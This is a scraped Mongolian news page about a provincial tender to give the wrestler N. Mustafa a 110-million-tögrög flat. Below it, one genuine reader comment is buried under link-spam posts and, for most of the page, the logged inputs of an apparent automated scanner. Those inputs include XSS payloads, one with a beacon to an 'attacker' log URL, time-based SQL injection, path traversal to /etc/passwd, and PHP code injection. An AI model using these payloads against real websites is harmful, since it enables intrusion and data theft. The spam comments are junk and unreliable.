Улсын начин Н.Мустафад 110 сая төгрөгөөр хоёр өрөө байр олгох тендер зарлажээ

Aдмин / Хууль

Улсын их баяр наадмаар Улсын начин цол хүртсэн Н.Мустафад Баян-Өлгий аймгийн орон нутгийн өмчийн газраас 110 сая төгрөгийн өртөг бүхий хоёр өрөө байр олгох нээлттэй тендер зарласан байна. Баян-Өлгий аймгийн Иргэдийн Төлөөлөгчдийн Хурлын 2020 оны ээлжит бус 11 дүгээр хуралдааны 92 дугаар тогтоолыг үндэслэн тус тендерийг зарласан байна.


Сэтгэгдэл

cdimlcyjx [116.0.1.138] 2021-02-11 02:40:34

Мэдээ.МН <a href="http://www.g0a0r636d91hk08wi5r31klmzk389oc5s.org/">acdimlcyjx</a> [url=http://www.g0a0r636d91hk08wi5r31klmzk389oc5s.org/]ucdimlcyjx[/url] cdimlcyjx http://www.g0a0r636d91hk08wi5r31klmzk389oc5s.org/

cnvyphbtw [116.0.1.138] 2021-01-18 09:36:11

Мэдээ.МН [url=http://www.g216n34r8oepx5w9qci233m86i508ners.org/]ucnvyphbtw[/url] <a href="http://www.g216n34r8oepx5w9qci233m86i508ners.org/">acnvyphbtw</a> cnvyphbtw http://www.g216n34r8oepx5w9qci233m86i508ners.org/

qvfgstwv [36.90.42.27] 2020-12-17 08:06:20

Мэдээ.МН [url=http://www.gx513j5y5fziy36a7692z5nzvp974mi2s.org/]uqvfgstwv[/url] qvfgstwv http://www.gx513j5y5fziy36a7692z5nzvp974mi2s.org/ <a href="http://www.gx513j5y5fziy36a7692z5nzvp974mi2s.org/">aqvfgstwv</a>

kjxsoliqcs [116.0.1.138] 2020-12-07 05:44:40

Мэдээ.МН [url=http://www.gy31q3pilt8mb6h4y1pcg187994e742os.org/]ukjxsoliqcs[/url] <a href="http://www.gy31q3pilt8mb6h4y1pcg187994e742os.org/">akjxsoliqcs</a> kjxsoliqcs http://www.gy31q3pilt8mb6h4y1pcg187994e742os.org/

qqtgqrikx [124.94.196.181] 2020-12-04 02:10:49

Мэдээ.МН <a href="http://www.gceb1574mm75of6cy41p705g9nc161nfs.org/">aqqtgqrikx</a> [url=http://www.gceb1574mm75of6cy41p705g9nc161nfs.org/]uqqtgqrikx[/url] qqtgqrikx http://www.gceb1574mm75of6cy41p705g9nc161nfs.org/

owsmyjwy [125.72.218.219] 2020-12-04 01:41:16

Мэдээ.МН [url=http://www.g2x000ftm07hy6m5dn9br5d6t6y63i88s.org/]uowsmyjwy[/url] owsmyjwy http://www.g2x000ftm07hy6m5dn9br5d6t6y63i88s.org/ <a href="http://www.g2x000ftm07hy6m5dn9br5d6t6y63i88s.org/">aowsmyjwy</a>

hzxbyhdsq [117.36.21.202] 2020-12-02 09:01:05

Мэдээ.МН [url=http://www.gh1y93k98kh2y7z681fkbpdz42h39m46s.org/]uhzxbyhdsq[/url] <a href="http://www.gh1y93k98kh2y7z681fkbpdz42h39m46s.org/">ahzxbyhdsq</a> hzxbyhdsq http://www.gh1y93k98kh2y7z681fkbpdz42h39m46s.org/

ihkpvbzhy [111.200.168.252] 2020-12-02 07:22:54

Мэдээ.МН ihkpvbzhy http://www.gh93qv264ung3nbezt6014l620lg2q80s.org/ <a href="http://www.gh93qv264ung3nbezt6014l620lg2q80s.org/">aihkpvbzhy</a> [url=http://www.gh93qv264ung3nbezt6014l620lg2q80s.org/]uihkpvbzhy[/url]

lqqtghzm [118.254.216.48] 2020-12-02 07:22:07

Мэдээ.МН lqqtghzm http://www.g43qgk4ybyg5643c6a0ld7o3q4k7347ns.org/ <a href="http://www.g43qgk4ybyg5643c6a0ld7o3q4k7347ns.org/">alqqtghzm</a> [url=http://www.g43qgk4ybyg5643c6a0ld7o3q4k7347ns.org/]ulqqtghzm[/url]

ijmgoepzh [117.15.98.139] 2020-12-01 05:16:03

Мэдээ.МН [url=http://www.gl6h9rto5q7g5i6bsnv40421c3245ds6s.org/]uijmgoepzh[/url] ijmgoepzh http://www.gl6h9rto5q7g5i6bsnv40421c3245ds6s.org/ <a href="http://www.gl6h9rto5q7g5i6bsnv40421c3245ds6s.org/">aijmgoepzh</a>

mejedhgpvi [223.150.68.65] 2020-12-01 00:07:10

Мэдээ.МН <a href="http://www.gayx958415f144c02i11tudzxr98xkq2s.org/">amejedhgpvi</a> [url=http://www.gayx958415f144c02i11tudzxr98xkq2s.org/]umejedhgpvi[/url] mejedhgpvi http://www.gayx958415f144c02i11tudzxr98xkq2s.org/

esyseifyyi [36.37.124.100] 2020-11-28 08:18:35

Мэдээ.МН <a href="http://www.gl5t2672ws1za7y59y7d5dz840aad9e5s.org/">aesyseifyyi</a> [url=http://www.gl5t2672ws1za7y59y7d5dz840aad9e5s.org/]uesyseifyyi[/url] esyseifyyi http://www.gl5t2672ws1za7y59y7d5dz840aad9e5s.org/

dkrtvnfglz [111.61.177.158] 2020-11-27 17:31:49

Мэдээ.МН <a href="http://www.gjo5772e1j02w3ajuif0nh192i31au33s.org/">adkrtvnfglz</a> dkrtvnfglz http://www.gjo5772e1j02w3ajuif0nh192i31au33s.org/ [url=http://www.gjo5772e1j02w3ajuif0nh192i31au33s.org/]udkrtvnfglz[/url]

tgtnbpsxrl [113.118.84.73] 2020-11-27 06:57:21

Мэдээ.МН [url=http://www.gde953warvh1b4cb5i2y2r69v530s575s.org/]utgtnbpsxrl[/url] tgtnbpsxrl http://www.gde953warvh1b4cb5i2y2r69v530s575s.org/ <a href="http://www.gde953warvh1b4cb5i2y2r69v530s575s.org/">atgtnbpsxrl</a>

oiozqdklo [61.142.20.26] 2020-11-27 02:14:57

Мэдээ.МН <a href="http://www.gu6t04yf1ndv1par0wc50l85v8168y06s.org/">aoiozqdklo</a> oiozqdklo http://www.gu6t04yf1ndv1par0wc50l85v8168y06s.org/ [url=http://www.gu6t04yf1ndv1par0wc50l85v8168y06s.org/]uoiozqdklo[/url]

zohsmqwt [183.18.52.143] 2020-11-24 05:59:16

Мэдээ.МН zohsmqwt http://www.g8o8dymd2z1jp38v414au131fv72q4m9s.org/ <a href="http://www.g8o8dymd2z1jp38v414au131fv72q4m9s.org/">azohsmqwt</a> [url=http://www.g8o8dymd2z1jp38v414au131fv72q4m9s.org/]uzohsmqwt[/url]

menojmjylm [106.124.93.69] 2020-11-24 04:47:10

Мэдээ.МН <a href="http://www.gt63303ar26zx3807oe50vt6qcxf9i3ps.org/">amenojmjylm</a> menojmjylm http://www.gt63303ar26zx3807oe50vt6qcxf9i3ps.org/ [url=http://www.gt63303ar26zx3807oe50vt6qcxf9i3ps.org/]umenojmjylm[/url]

nzowwcphs [113.72.120.104] 2020-11-23 13:46:05

Мэдээ.МН nzowwcphs http://www.g7z50w1wr1qet68w0s4ke6o2xu28315is.org/ [url=http://www.g7z50w1wr1qet68w0s4ke6o2xu28315is.org/]unzowwcphs[/url] <a href="http://www.g7z50w1wr1qet68w0s4ke6o2xu28315is.org/">anzowwcphs</a>

fgfkltbns [113.251.25.200] 2020-11-23 02:34:32

Мэдээ.МН [url=http://www.g3f5n78std486715on42b3ovc30bnm0es.org/]ufgfkltbns[/url] fgfkltbns http://www.g3f5n78std486715on42b3ovc30bnm0es.org/ <a href="http://www.g3f5n78std486715on42b3ovc30bnm0es.org/">afgfkltbns</a>

rgyhqydwgr [113.72.120.104] 2020-11-22 23:24:26

Мэдээ.МН [url=http://www.g58046iy759im1t2g09vpwm1pfz98ct5s.org/]urgyhqydwgr[/url] rgyhqydwgr http://www.g58046iy759im1t2g09vpwm1pfz98ct5s.org/ <a href="http://www.g58046iy759im1t2g09vpwm1pfz98ct5s.org/">argyhqydwgr</a>

qpmlxwypm [110.52.145.234] 2020-11-22 08:38:08

Мэдээ.МН qpmlxwypm http://www.g082u3g2dcu8906vc73u7c8eg13kfp6es.org/ <a href="http://www.g082u3g2dcu8906vc73u7c8eg13kfp6es.org/">aqpmlxwypm</a> [url=http://www.g082u3g2dcu8906vc73u7c8eg13kfp6es.org/]uqpmlxwypm[/url]

dyezrshgzr [58.250.61.112] 2020-11-21 03:01:48

Мэдээ.МН <a href="http://www.ghj84doms2r7m769la55c3cx05zw6681s.org/">adyezrshgzr</a> dyezrshgzr http://www.ghj84doms2r7m769la55c3cx05zw6681s.org/ [url=http://www.ghj84doms2r7m769la55c3cx05zw6681s.org/]udyezrshgzr[/url]

ccymlqlvrb [36.37.124.100] 2020-11-20 06:31:08

Мэдээ.МН <a href="http://www.g2y4j48n9f5e52rnu8z468cg82hj51lhs.org/">accymlqlvrb</a> ccymlqlvrb http://www.g2y4j48n9f5e52rnu8z468cg82hj51lhs.org/ [url=http://www.g2y4j48n9f5e52rnu8z468cg82hj51lhs.org/]uccymlqlvrb[/url]

wnnwdcnqqg [1.58.55.62] 2020-11-15 13:46:15

Мэдээ.МН <a href="http://www.g05079463h6ad5gprgv4hof74rz6lj71s.org/">awnnwdcnqqg</a> wnnwdcnqqg http://www.g05079463h6ad5gprgv4hof74rz6lj71s.org/ [url=http://www.g05079463h6ad5gprgv4hof74rz6lj71s.org/]uwnnwdcnqqg[/url]

cndjzwpbcq [124.234.54.22] 2020-11-12 23:09:50

Мэдээ.МН cndjzwpbcq http://www.g8j6g4w1k44g242n02sm0x51mbdt96fks.org/ [url=http://www.g8j6g4w1k44g242n02sm0x51mbdt96fks.org/]ucndjzwpbcq[/url] <a href="http://www.g8j6g4w1k44g242n02sm0x51mbdt96fks.org/">acndjzwpbcq</a>

dfplsoryc [223.95.112.107] 2020-11-12 05:53:07

Мэдээ.МН dfplsoryc http://www.gdo482r06s774khti9976y7ij19pily2s.org/ <a href="http://www.gdo482r06s774khti9976y7ij19pily2s.org/">adfplsoryc</a> [url=http://www.gdo482r06s774khti9976y7ij19pily2s.org/]udfplsoryc[/url]

rfonhkhx [14.124.117.33] 2020-11-09 01:09:34

Мэдээ.МН <a href="http://www.g76z8ue4rud2v38y8oplyfc05e856092s.org/">arfonhkhx</a> [url=http://www.g76z8ue4rud2v38y8oplyfc05e856092s.org/]urfonhkhx[/url] rfonhkhx http://www.g76z8ue4rud2v38y8oplyfc05e856092s.org/

pwrnsjhwhh [118.239.26.8] 2020-11-06 09:23:42

Мэдээ.МН <a href="http://www.gx08od1x2d6f7v1i79kq3y1g16pxi174s.org/">apwrnsjhwhh</a> [url=http://www.gx08od1x2d6f7v1i79kq3y1g16pxi174s.org/]upwrnsjhwhh[/url] pwrnsjhwhh http://www.gx08od1x2d6f7v1i79kq3y1g16pxi174s.org/

nhkhsddxqw [84.241.4.18] 2020-11-04 09:56:09

Мэдээ.МН nhkhsddxqw http://www.g19er77r22385mpzlr929344rby6yjces.org/ <a href="http://www.g19er77r22385mpzlr929344rby6yjces.org/">anhkhsddxqw</a> [url=http://www.g19er77r22385mpzlr929344rby6yjces.org/]unhkhsddxqw[/url]

wrdvwdrmqb [203.189.141.214] 2020-11-04 04:40:13

Мэдээ.МН [url=http://www.g0k36f4rey7px3v92788kxh4403glo3rs.org/]uwrdvwdrmqb[/url] <a href="http://www.g0k36f4rey7px3v92788kxh4403glo3rs.org/">awrdvwdrmqb</a> wrdvwdrmqb http://www.g0k36f4rey7px3v92788kxh4403glo3rs.org/

qynhrfxkrb [203.189.141.214] 2020-11-04 04:40:07

Мэдээ.МН [url=http://www.gxwlt339s4z31f5w4cv8q5z950lz7w61s.org/]uqynhrfxkrb[/url] <a href="http://www.gxwlt339s4z31f5w4cv8q5z950lz7w61s.org/">aqynhrfxkrb</a> qynhrfxkrb http://www.gxwlt339s4z31f5w4cv8q5z950lz7w61s.org/

e [116.113.93.82] 2020-10-28 22:28:02

1

Зочин [103.80.210.251] 2020-10-30 02:35:03

Хандивин мөнгөөр өгч болно. харин улсын төсвөөс болон засаг даргын нөөц хөрөнгөөс өгч болохгүй. ЗД-ын нөөс хөрөнгийг зориулалтын дагуу зарцуулах ёстой.Аймгийн орон нутгийн өмчийн хороонд ажилаа мэддэг хүн байхгүй байгаа, өмч хөрөнгө эдэнгүйдсэн

e [116.113.93.82] 2020-10-28 22:27:57

1

e [116.113.93.82] 2020-10-28 22:27:53

1

e [116.113.93.82] 2020-10-28 22:27:48

1<rtDUNR<

e [116.113.93.82] 2020-10-28 22:27:45

1<img sRc='http://attacker-9333/log.php?

e [116.113.93.82] 2020-10-28 22:27:40

1<sSGHGx x=9730>

e [116.113.93.82] 2020-10-28 22:27:36

1<ifRAme sRc=9696.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:27:31

1<WXEP65>B66TR[!+!]</WXEP65>

e [116.113.93.82] 2020-10-28 22:27:26

1mINCS <ScRiPt >Je3I(9541)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:27:23

1<% contenteditable onresize=Je3I(9095)>

e [116.113.93.82] 2020-10-28 22:27:18

1}body{acu:Expre/**/SSion(Je3I(9914))}

e [116.113.93.82] 2020-10-28 22:27:15

1<img<!-- --> src=x onerror=alert(9695);//><!-- -->

e [116.113.93.82] 2020-10-28 22:27:10

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:27:06

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:27:02

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:26:55

1<input autofocus onfocus=Je3I(9516)>

e [116.113.93.82] 2020-10-28 22:26:52

e [116.113.93.82] 2020-10-28 22:26:48

1<ScRiPt>Je3I(9209)</sCripT>

e [116.113.93.82] 2020-10-28 22:26:45

1\u003CScRiPt\Je3I(9405)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:26:41

%31%3C%53%63%52%69%50%74%20%3E%4A%65%33%49%289244%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:26:36

1<img/src=">" onerror=alert(9539)>

e [116.113.93.82] 2020-10-28 22:26:34

1<img src=xyz OnErRor=Je3I(9244)>

e [116.113.93.82] 2020-10-28 22:26:25

1<img src=//testasp.vulnweb.com/t/dot.gif onload=Je3I(9985)>

e [116.113.93.82] 2020-10-28 22:26:22

1<body onload=Je3I(9840)>

e [116.113.93.82] 2020-10-28 22:26:17

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9405'>

e [116.113.93.82] 2020-10-28 22:26:13

1<isindex type=image src=1 onerror=Je3I(9829)>

e [116.113.93.82] 2020-10-28 22:26:08

1<svg

e [116.113.93.82] 2020-10-28 22:26:05

1<video><source onerror="javascript:Je3I(9685)">

e [116.113.93.82] 2020-10-28 22:26:02

1<ScRiPt >Je3I(9490)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:25:55

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9670></ScRiPt>

e [116.113.93.82] 2020-10-28 22:25:51

1<ScRiPt >Je3I(9082)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:25:47

1<ScR<ScRiPt>IpT>Je3I(9744)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:25:44

1<script>Je3I(9098)</script>

e [116.113.93.82] 2020-10-28 22:25:41

1<WFTDSH>VVRHB[!+!]</WFTDSH>

e [116.113.93.82] 2020-10-28 22:25:37

1<ScRiPt >Je3I(9900)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:25:34

{{9999106*9999676}}

e [116.113.93.82] 2020-10-28 22:25:30

acux5119

e [116.113.93.82] 2020-10-28 22:25:25

acu4627<s1﹥s2ʺs3ʹuca4627

e [116.113.93.82] 2020-10-28 22:25:20

19597412

e [116.113.93.82] 2020-10-28 22:25:16

'"()&%<acx><ScRiPt >Je3I(9744)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:25:13

1'"()&%<acx><ScRiPt >Je3I(9004)</ScRiPt>

e [116.113.93.82<hCJABD<] 2020-10-28 22:25:05

1

e [116.113.93.82<img sRc='http://attacker-9511/log.php?] 2020-10-28 22:25:00

1

e [116.113.93.82<zDqDzz x=9401>] 2020-10-28 22:24:54

1

e [116.113.93.82<ifRAme sRc=9852.com></IfRamE>] 2020-10-28 22:24:49

1

e [116.113.93.82<WPGF4X>VWJNK[!+!]</WPGF4X>] 2020-10-28 22:24:43

1

e [116.113.93.82k5JFS <ScRiPt >Je3I(9861)</ScRiPt>] 2020-10-28 22:24:39

1

e [116.113.93.82<% contenteditable onresize=Je3I(9571)>] 2020-10-28 22:24:36

1

e [116.113.93.82}body{acu:Expre/**/SSion(Je3I(9633))}] 2020-10-28 22:24:33

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9761);//><!-- -->] 2020-10-28 22:24:30

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:24:26

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:24:24

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:24:19

1

e [116.113.93.82<input autofocus onfocus=Je3I(9139)>] 2020-10-28 22:24:16

1

e [] 2020-10-28 22:24:13

1

e [116.113.93.82<ScRiPt>Je3I(9275)</sCripT>] 2020-10-28 22:24:09

1

e [116.113.93.82\u003CScRiPt\Je3I(9198)\u003C/sCripT\u003E] 2020-10-28 22:24:05

1

e [116.113.93.82] 2020-10-28 22:24:04

1

e [116.113.93.82] 2020-10-28 22:24:02

1

e [116.113.93.82] 2020-10-28 22:24:01

1

e [116.113.93.82] 2020-10-28 22:24:00

1

e [116.113.93.82] 2020-10-28 22:24:00

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%4A%65%33%49%289482%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:24:00

1

e [116.113.93.82] 2020-10-28 22:23:59

1

e [116.113.93.82] 2020-10-28 22:23:59

1

e [116.113.93.82] 2020-10-28 22:23:58

1

e [116.113.93.82] 2020-10-28 22:23:58

1

e [116.113.93.82] 2020-10-28 22:23:57

1

e [116.113.93.82<img/src=">" onerror=alert(9576)>] 2020-10-28 22:23:56

1

e [116.113.93.82] 2020-10-28 22:23:56

1

e [116.113.93.82] 2020-10-28 22:23:55

1

e [116.113.93.82] 2020-10-28 22:23:54

1

e [116.113.93.82] 2020-10-28 22:23:53

1

e [116.113.93.82] 2020-10-28 22:23:53

1

e [116.113.93.82<img src=xyz OnErRor=Je3I(9017)>] 2020-10-28 22:23:52

1

e [116.113.93.82] 2020-10-28 22:23:52

1

e [116.113.93.82] 2020-10-28 22:23:51

1

e [116.113.93.82] 2020-10-28 22:23:50

1

e [116.113.93.82] 2020-10-28 22:23:50

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=Je3I(9770)>] 2020-10-28 22:23:50

1

e [116.113.93.82] 2020-10-28 22:23:48

1

e [116.113.93.82] 2020-10-28 22:23:48

1

e [116.113.93.82] 2020-10-28 22:23:47

1

e [116.113.93.82] 2020-10-28 22:23:47

1

e [116.113.93.82] 2020-10-28 22:23:46

1

e [116.113.93.82] 2020-10-28 22:23:46

1

e [116.113.93.82<body onload=Je3I(9844)>] 2020-10-28 22:23:46

1

e [116.113.93.82] 2020-10-28 22:23:46

1

e [116.113.93.82] 2020-10-28 22:23:46

1

e [116.113.93.82] 2020-10-28 22:23:45

1

e [116.113.93.82] 2020-10-28 22:23:45

1

e [116.113.93.82] 2020-10-28 22:23:43

1

e [116.113.93.82] 2020-10-28 22:23:42

1

e [116.113.93.82] 2020-10-28 22:23:42

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9437'>] 2020-10-28 22:23:42

1

e [116.113.93.82] 2020-10-28 22:23:42

1

e [116.113.93.82] 2020-10-28 22:23:41

1

e [116.113.93.82] 2020-10-28 22:23:40

1

e [116.113.93.82] 2020-10-28 22:23:39

1

e [116.113.93.82<isindex type=image src=1 onerror=Je3I(9418)>] 2020-10-28 22:23:38

1

e [116.113.93.82] 2020-10-28 22:23:38

1

e [116.113.93.82<svg ] 2020-10-28 22:23:36

1

e [116.113.93.82] 2020-10-28 22:23:36

1

e [116.113.93.82] 2020-10-28 22:23:34

1

e [116.113.93.82] 2020-10-28 22:23:33

1

e [116.113.93.82<video><source onerror="javascript:Je3I(9071)">] 2020-10-28 22:23:30

1

e [116.113.93.82<ScRiPt >Je3I(9595)</ScRiPt>] 2020-10-28 22:23:25

1

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9958></ScRiPt>] 2020-10-28 22:23:21

1

e [116.113.93.82<ScRiPt >Je3I(9987)</ScRiPt>] 2020-10-28 22:23:14

1

e [116.113.93.82] 2020-10-28 22:23:10

1

e [116.113.93.82<ScR<ScRiPt>IpT>Je3I(9364)</sCr<ScRiPt>IpT>] 2020-10-28 22:23:10

1

e [116.113.93.82] 2020-10-28 22:23:09

1

e [116.113.93.82] 2020-10-28 22:23:08

DfkJsbIq'));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:23:07

waduiS1a');select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:23:06

1

e [116.113.93.82] 2020-10-28 22:23:06

ApNwUKpN';select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:23:05

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 22:23:05

1

e [116.113.93.82] 2020-10-28 22:23:04

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:23:04

1

e [116.113.93.82] 2020-10-28 22:23:04

-1));select pg_sleep(9); --

e [116.113.93.82<script>Je3I(9052)</script>] 2020-10-28 22:23:03

1

e [116.113.93.82] 2020-10-28 22:23:03

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:23:03

1

e [116.113.93.82] 2020-10-28 22:23:03

-1);select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:23:02

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:23:01

-1;select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:23:01

file:///etc/passwd

e [116.113.93.82] 2020-10-28 22:23:00

1

e [116.113.93.82] 2020-10-28 22:23:00

jssQ1N7W'; waitfor delay '0:0:6' --

e [116.113.93.82<W3ZXDX>1C1C4[!+!]</W3ZXDX>] 2020-10-28 22:22:59

1

e [116.113.93.82] 2020-10-28 22:22:59

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:22:59

1 waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:22:58

..

e [116.113.93.82] 2020-10-28 22:22:58

-1); waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:22:57

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 22:22:57

-1; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:22:56

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:22:56

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82<ScRiPt >Je3I(9989)</ScRiPt>] 2020-10-28 22:22:56

1

e [116.113.93.82] 2020-10-28 22:22:55

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 22:22:55

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:22:54

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:22:54

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82] 2020-10-28 22:22:53

/etc/passwd

e [116.113.93.82] 2020-10-28 22:22:52

if(now()=sysdate(),sleep(6),0)

e [116.113.93.82] 2020-10-28 22:22:52

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 22:22:51

-1" OR 2+253-253-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:22:50

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:22:50

e [{{9999141*10000216}}] 2020-10-28 22:22:50

1

e [116.113.93.82] 2020-10-28 22:22:48

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:22:48

-1' OR 2+565-565-1=0+0+0+1 or 'wZ1yv0yM'='

e [116.113.93.82] 2020-10-28 22:22:47

-1' OR 2+975-975-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:22:47

../../../../../../../../../../etc/passwd.jpg

e [acux6694] 2020-10-28 22:22:46

1

e [116.113.93.82] 2020-10-28 22:22:46

-1 OR 2+520-520-1=0+0+0+1

e [116.113.93.82] 2020-10-28 22:22:46

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 22:22:46

e [116.113.93.82] 2020-10-28 22:22:45

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 22:22:45

-1 OR 2+773-773-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:22:45

JyI=

e [116.113.93.82] 2020-10-28 22:22:44

ekFGW2ET

e [116.113.93.82] 2020-10-28 22:22:44

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 22:22:44

@@MmlfY

e [116.113.93.82] 2020-10-28 22:22:43

1

e [116.113.93.82] 2020-10-28 22:22:42

1

e [116.113.93.82] 2020-10-28 22:22:41

\

e [acu7050<s1﹥s2ʺs3ʹuca7050] 2020-10-28 22:22:41

1

e [116.113.93.82] 2020-10-28 22:22:40

1

e [116.113.93.82] 2020-10-28 22:22:40

1'"

e [116.113.93.82] 2020-10-28 22:22:39

1

e [116.113.93.82] 2020-10-28 22:22:38

1

e [116.113.93.82] 2020-10-28 22:22:38

1

e [116.113.93.82] 2020-10-28 22:22:37

1

e [116.113.93.82] 2020-10-28 22:22:37

1

e [116.113.93.82] 2020-10-28 22:22:37

1

e [116.113.93.82] 2020-10-28 22:22:37

1

e [116.113.93.82] 2020-10-28 22:22:37

1

e [116.113.93.829328699] 2020-10-28 22:22:36

1

e [116.113.93.82] 2020-10-28 22:22:36

1

e [116.113.93.82] 2020-10-28 22:22:36

1

e [116.113.93.82] 2020-10-28 22:22:36

1

e [116.113.93.82] 2020-10-28 22:22:35

1

e [116.113.93.82] 2020-10-28 22:22:35

1

e [116.113.93.82] 2020-10-28 22:22:33

1

e [116.113.93.82] 2020-10-28 22:22:33

<!--

e [116.113.93.82] 2020-10-28 22:22:32

'"

e [116.113.93.82] 2020-10-28 22:22:31

1

e ['"()&%<acx><ScRiPt >Je3I(9358)</ScRiPt>] 2020-10-28 22:22:30

1

e [] 2020-10-28 22:22:28

1

e [116.113.93.82] 2020-10-28 22:22:28

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 22:22:28

${@print(md5(acunetix_wvs_security_test))}\

e [] 2020-10-28 22:22:27

1

e [116.113.93.82] 2020-10-28 22:22:27

1

e [116.113.93.82'"()&%<acx><ScRiPt >Je3I(9713)</ScRiPt>] 2020-10-28 22:22:27

1

e [116.113.93.82] 2020-10-28 22:22:27

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 22:22:27

create/.

e [<!--] 2020-10-28 22:22:27

1

e [116.113.93.82] 2020-10-28 22:22:26

1

e [JyI=] 2020-10-28 22:22:26

1

e [116.113.93.82] 2020-10-28 22:22:26

1

e [116.113.93.82] 2020-10-28 22:22:26

";print(md5(acunetix_wvs_security_test));$a="

e [116.113.93.82] 2020-10-28 22:22:26

1

e ['"] 2020-10-28 22:22:26

1

e [116.113.93.82] 2020-10-28 22:22:26

create

